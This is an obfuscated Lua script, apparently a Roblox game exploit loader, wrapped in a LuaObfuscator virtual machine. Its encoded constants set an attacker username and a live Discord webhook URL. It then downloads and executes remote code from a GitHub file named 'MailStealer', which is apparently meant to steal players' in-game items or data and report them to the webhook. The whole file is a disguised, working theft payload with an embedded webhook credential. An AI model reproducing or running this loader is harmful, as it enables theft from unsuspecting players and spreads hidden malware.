--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v30,16));if v19 then local v99=v5(v84,v19);v19=nil;return v99;else return v84;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v85=(v31/((879 -(282 + 595))^(v32-1)))%((5 -3)^(((v33-(2 -(1638 -(1523 + 114)))) -(v32-(1 -0))) + (2 -1))) ;return v85-(v85%(620 -(499 + 56 + 64))) ;else local v86=931 -(857 + 74) ;local v87;while true do if (v86==(568 -(367 + 201))) then v87=2^(v32-(928 -(214 + 713))) ;return (((v31%(v87 + v87))>=v87) and (1 + (0 -0))) or (0 + 0) ;end end end end local function v21()local v34=1065 -(68 + 997) ;local v35;while true do if (v34==(1271 -(226 + 1024 + 20))) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + (4 -3) ;v34=118 -(32 + 85) ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 1 + 1 );v18=v18 + (959 -(892 + 65)) ;return (v37 * (610 -354)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (5 -2) );v18=v18 + 4 ;return (v41 * (30800116 -14022900)) + (v40 * (65886 -(87 + 193 + 70))) + (v39 * ((1070 -634) -(67 + 84 + 29))) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=3 -2 ;local v45=(v20(v43,1,972 -(802 + 150) ) * ((5 -3)^((208 -151) -25))) + v42 ;local v46=v20(v43,16 + 5 ,1028 -(915 + 82) );local v47=((v20(v43,90 -58 )==(1 + 0)) and  -(1 -0)) or (1188 -(1069 + 118)) ;if (v46==0) then if (v45==0) then return v47 * ((1555 -1117) -(145 + 293)) ;else v46=(1290 -(814 + 45)) -((108 -64) + 386) ;v44=0 -0 ;end elseif (v46==(651 + 1396)) then return ((v45==(0 -0)) and (v47 * ((773 -(201 + 571))/0))) or (v47 * NaN) ;end return v8(v47,v46-(178 + 46 + 799) ) * (v44 + (v45/((3 -1)^(52 + 0)))) ;end local function v25(v48)local v49;if  not v48 then local v88=0 + 0 ;while true do if (v88==(885 -(261 + (2047 -(630 + 793))))) then v48=v23();if (v48==(0 -0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;local v50={};for v67=1081 -(1020 + 60) , #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=1769 -(1749 + 20) ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (2~=v51) then else v56=nil;v57=nil;v51=3;end if (v51==(1 + 2)) then v58=nil;v59=nil;v51=4;end if (v51==4) then v60=nil;while true do if (v52==1) then local v97=0;while true do if ((1323 -(1249 + 73))~=v97) then else v52=2;break;end if (v97~=0) then else v55=nil;v56=nil;v97=1 + 0 ;end end end if (v52~=(1147 -(466 + 679))) then else local v98=0;while true do if ((2 -1)==v98) then v52=8 -5 ;break;end if (v98==(1900 -(106 + 1794))) then v57=nil;v58=nil;v98=1 + 0 ;end end end if (v52~=0) then else v53=0 + 0 ;v54=nil;v52=2 -1 ;end if (v52==4) then while true do if (v53==0) then local v100=0;while true do if (1==v100) then v53=2 -1 ;break;end if (v100==(114 -(4 + 110))) then v54=584 -(57 + 527) ;v55=nil;v100=1428 -(41 + 1386) ;end end end if (1~=v53) then else local v101=0;while true do if (v101~=0) then else v56=nil;v57=nil;v101=104 -(17 + 86) ;end if (1~=v101) then else v53=2;break;end end end if (v53~=3) then else v60=nil;while true do local v103=0;local v104;while true do if ((0 + 0)==v103) then v104=0 -0 ;while true do if ((0 -0)~=v104) then else local v139=166 -(122 + 44) ;local v140;while true do if (v139==(0 -0)) then v140=0 -0 ;while true do if (v140==(1 + 0)) then v104=1;break;end if (v140~=0) then else local v162=0 + 0 ;while true do if (0==v162) then if (v54==0) then local v179=0;local v180;local v181;while true do if (v179~=(1 -0)) then else while true do if (v180==0) then v181=0;while true do if (v181~=(65 -(30 + 35))) then else v55={};v56={};v181=1 + 0 ;end if (v181==(1258 -(1043 + 214))) then v57={};v54=3 -2 ;break;end end break;end end break;end if (v179==(1212 -(323 + 889))) then v180=0;v181=nil;v179=1;end end end if (v54==(7 -4)) then local v182=580 -(361 + 219) ;while true do if (v182~=0) then else local v186=0;while true do if (v186==(320 -(53 + 267))) then for v190=1 + 0 ,v23() do v56[v190-(414 -(15 + 398)) ]=v28();end return v58;end end end end end v162=1;end if (v162==(983 -(18 + 964))) then v140=1;break;end end end end break;end end end if (v104==(3 -2)) then if (v54==1) then local v154=0 + 0 ;local v155;while true do if (v154==0) then v155=0;while true do if (v155==1) then v60={};v54=2;break;end if (v155==(0 + 0)) then local v175=0;local v176;while true do if (v175==0) then v176=850 -(20 + 830) ;while true do if (v176==0) then local v187=0 + 0 ;while true do if (v187==1) then v176=127 -(116 + 10) ;break;end if (v187==(0 + 0)) then v58={v55,v56,nil,v57};v59=v23();v187=1 + 0 ;end end end if (v176==(1 + 0)) then v155=1 + 0 ;break;end end break;end end end end break;end end end if (v54~=2) then else local v156=0;while true do if (v156==0) then for v163=1,v59 do local v164=0;local v165;local v166;local v167;local v168;while true do if ((2 -1)==v164) then local v177=0 -0 ;while true do if (v177~=(1551 -(1126 + 425))) then else v167=nil;v168=nil;v177=1;end if (v177~=(406 -(118 + 287))) then else v164=2;break;end end end if (v164~=0) then else local v178=0;while true do if (v178~=(0 -0)) then else v165=0;v166=nil;v178=1122 -(118 + 1003) ;end if (v178~=(2 -1)) then else v164=1;break;end end end if (2==v164) then while true do if (v165~=(378 -(142 + 235))) then else v168=nil;while true do if ((0 -0)==v166) then local v188=0;while true do if (v188==(0 + 0)) then v167=v21();v168=nil;v188=1;end if (1~=v188) then else v166=1;break;end end end if (v166~=1) then else if (v167==1) then v168=v21()~=(977 -(553 + 424)) ;elseif (v167==2) then v168=v24();elseif (v167==3) then v168=v25();end v60[v163]=v168;break;end end break;end if (v165==0) then local v183=0 -0 ;local v184;while true do if (v183==0) then v184=0 + 0 ;while true do if (v184==1) then v165=1;break;end if (v184==(0 + 0)) then v166=0;v167=nil;v184=1 + 0 ;end end break;end end end end break;end end end v58[3]=v21();v156=1;end if (1==v156) then for v169=1,v23() do local v170=0 + 0 ;local v171;local v172;local v173;local v174;while true do if (v170==(1 + 0)) then v173=nil;v174=nil;v170=4 -2 ;end if (0==v170) then v171=0;v172=nil;v170=2 -1 ;end if (v170==(4 -2)) then while true do if (v171~=(1 + 0)) then else v174=nil;while true do if (v172==1) then while true do if (v173==(0 -0)) then v174=v21();if (v20(v174,754 -(239 + 514) ,1 + 0 )==0) then local v192=0;local v193;local v194;local v195;local v196;while true do if (v192~=(1331 -(797 + 532))) then else while true do if (v193==1) then local v198=0 + 0 ;local v199;local v200;while true do if (v198==(0 + 0)) then v199=0;v200=nil;v198=1;end if (v198~=1) then else while true do if (v199~=0) then else v200=0 -0 ;while true do if (v200==1) then v193=2;break;end if (v200==(1202 -(373 + 829))) then local v214=731 -(476 + 255) ;while true do if (v214~=(1130 -(369 + 761))) then else local v216=0;while true do if (v216~=(0 + 0)) then else v196={v22(),v22(),nil,nil};if (v194==(0 + 0)) then local v217=0 -0 ;local v218;while true do if (v217==(336 -(144 + 192))) then v218=0;while true do if (v218==(216 -(42 + 174))) then v196[3]=v22();v196[4]=v22();break;end end break;end end elseif (v194==(1 + 0)) then v196[3]=v23();elseif (v194==2) then v196[3 + 0 ]=v23() -((1 + 1)^16) ;elseif (v194==(1507 -(363 + 1141))) then local v223=0;local v224;local v225;while true do if (v223~=1) then else while true do if (v224==0) then v225=1580 -(1183 + 397) ;while true do if (v225==0) then v196[3]=v23() -((5 -3)^16) ;v196[3 + 1 ]=v22();break;end end break;end end break;end if (v223==(0 + 0)) then local v226=1975 -(1913 + 62) ;while true do if (v226==(0 + 0)) then v224=0 -0 ;v225=nil;v226=1934 -(565 + 1368) ;end if (v226~=(3 -2)) then else v223=1662 -(1477 + 184) ;break;end end end end end v216=1;end if (v216==(1 -0)) then v214=1 + 0 ;break;end end end if (v214~=(857 -(564 + 292))) then else v200=1 -0 ;break;end end end end break;end end break;end end end if (v193==(5 -3)) then local v201=304 -(244 + 60) ;local v202;while true do if (v201==0) then v202=0 + 0 ;while true do if (v202~=(476 -(41 + 435))) then else if (v20(v195,1002 -(938 + 63) ,1 + 0 )==1) then v196[2]=v60[v196[2]];end if (v20(v195,1127 -(936 + 189) ,2)==(1 + 0)) then v196[1616 -(1565 + 48) ]=v60[v196[3]];end v202=1;end if (1==v202) then v193=2 + 1 ;break;end end break;end end end if ((1138 -(782 + 356))~=v193) then else local v203=267 -(176 + 91) ;local v204;local v205;while true do if (v203~=(0 -0)) then else v204=0 -0 ;v205=nil;v203=1093 -(975 + 117) ;end if (v203==(1876 -(157 + 1718))) then while true do if (v204~=0) then else v205=0;while true do if (v205~=(0 + 0)) then else local v215=0 -0 ;while true do if (v215~=(0 -0)) then else v194=v20(v174,1020 -(697 + 321) ,3);v195=v20(v174,10 -6 ,12 -6 );v215=2 -1 ;end if (v215==(1 + 0)) then v205=1 -0 ;break;end end end if (v205==(2 -1)) then v193=1;break;end end break;end end break;end end end if (v193~=(1230 -(322 + 905))) then else if (v20(v195,3,3)==(612 -(602 + 9))) then v196[4]=v60[v196[4]];end v55[v169]=v196;break;end end break;end if (v192==0) then local v197=1189 -(449 + 740) ;while true do if (v197==1) then v192=873 -(826 + 46) ;break;end if (v197~=(947 -(245 + 702))) then else local v207=0 -0 ;while true do if (v207==(1 + 0)) then v197=1;break;end if (v207~=(1898 -(260 + 1638))) then else v193=0;v194=nil;v207=1;end end end end end if (1==v192) then v195=nil;v196=nil;v192=2;end end end break;end end break;end if (v172==0) then v173=0;v174=nil;v172=1;end end break;end if (v171==0) then local v185=0;while true do if (v185==1) then v171=441 -(382 + 58) ;break;end if (v185==0) then v172=0 -0 ;v173=nil;v185=1 + 0 ;end end end end break;end end end v54=3;break;end end end break;end end break;end end end break;end if ((3 -1)==v53) then local v102=0;while true do if (v102==1) then v53=3;break;end if ((0 -0)==v102) then v58=nil;v59=nil;v102=1;end end end end break;end if (v52==3) then v59=nil;v60=nil;v52=4;end end break;end if (v51~=(1206 -(902 + 303))) then else v54=nil;v55=nil;v51=3 -1 ;end if (v51==(0 -0)) then v52=0 + 0 ;v53=nil;v51=1691 -(1121 + 569) ;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v89=0,v77 do if (v89>=v71) then v75[v89-v71 ]=v76[v89 + 1 ];else v79[v89]=v76[v89 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v90=0;while true do if (v90==0) then v81=v69[v73];v82=v81[1];v90=1;end if (v90==1) then if (v82<=7) then if (v82<=3) then if (v82<=1) then if (v82>0) then local v105=0;local v106;local v107;local v108;local v109;while true do if (v105==1) then v74=(v108 + v106) -1 ;v109=0;v105=2;end if (v105==2) then for v150=v106,v74 do local v151=0;while true do if (v151==0) then v109=v109 + 1 ;v79[v150]=v107[v109];break;end end end break;end if (v105==0) then v106=v81[2];v107,v108=v72(v79[v106](v13(v79,v106 + 1 ,v81[3])));v105=1;end end else local v110=0;local v111;local v112;while true do if (v110==1) then v79[v111 + 1 ]=v112;v79[v111]=v112[v81[4]];break;end if (v110==0) then v111=v81[2];v112=v79[v81[3]];v110=1;end end end elseif (v82==2) then do return;end else v79[v81[2]]();end elseif (v82<=5) then if (v82>4) then v79[v81[2]]();else v79[v81[2]]=v63[v81[3]];end elseif (v82==6) then v79[v81[2]]=v63[v81[3]];else local v117=v81[2];local v118=v79[v81[3]];v79[v117 + 1 ]=v118;v79[v117]=v118[v81[4]];end elseif (v82<=11) then if (v82<=9) then if (v82>8) then v79[v81[2]]=v81[3];else local v124=0;local v125;while true do if (v124==0) then v125=v81[2];v79[v125]=v79[v125](v13(v79,v125 + 1 ,v74));break;end end end elseif (v82>10) then v79[v81[2]]=v81[3];else v79[v81[2]][v81[3]]=v81[4];end elseif (v82<=13) then if (v82==12) then local v130=v81[2];v79[v130]=v79[v130](v13(v79,v130 + 1 ,v74));else local v132=0;local v133;local v134;local v135;local v136;while true do if (v132==0) then v133=v81[2];v134,v135=v72(v79[v133](v13(v79,v133 + 1 ,v81[3])));v132=1;end if (v132==2) then for v152=v133,v74 do local v153=0;while true do if (v153==0) then v136=v136 + 1 ;v79[v152]=v134[v136];break;end end end break;end if (v132==1) then v74=(v135 + v133) -1 ;v136=0;v132=2;end end end elseif (v82>14) then do return;end else v79[v81[2]][v81[3]]=v81[4];end v73=v73 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!093O0003023O005F4703093O00557365724E616D6579030C3O00636861726C6573343538323503083O00576562682O6F6B7903793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O313932303932343O38332O32383730322F726169386B68596B727A324A5575326F78544D6435772D3034796534645A46717875424A7338354C6873783056765759787648352O6F49644F74453973464A494E4D4352030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403623O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F486F73742O655363726970747A2F486F73742O654875622F6D61696E2F2545322539432539372532304D61696C537465616C6572253230254532253943253937000C3O0012043O00013O00300A3O000200030012043O00013O00300A3O000400050012043O00063O001204000100073O00202O00010001000800120B000300094O0001000100034O00085O00022O00053O000100012O00023O00017O00",v9(),...);end
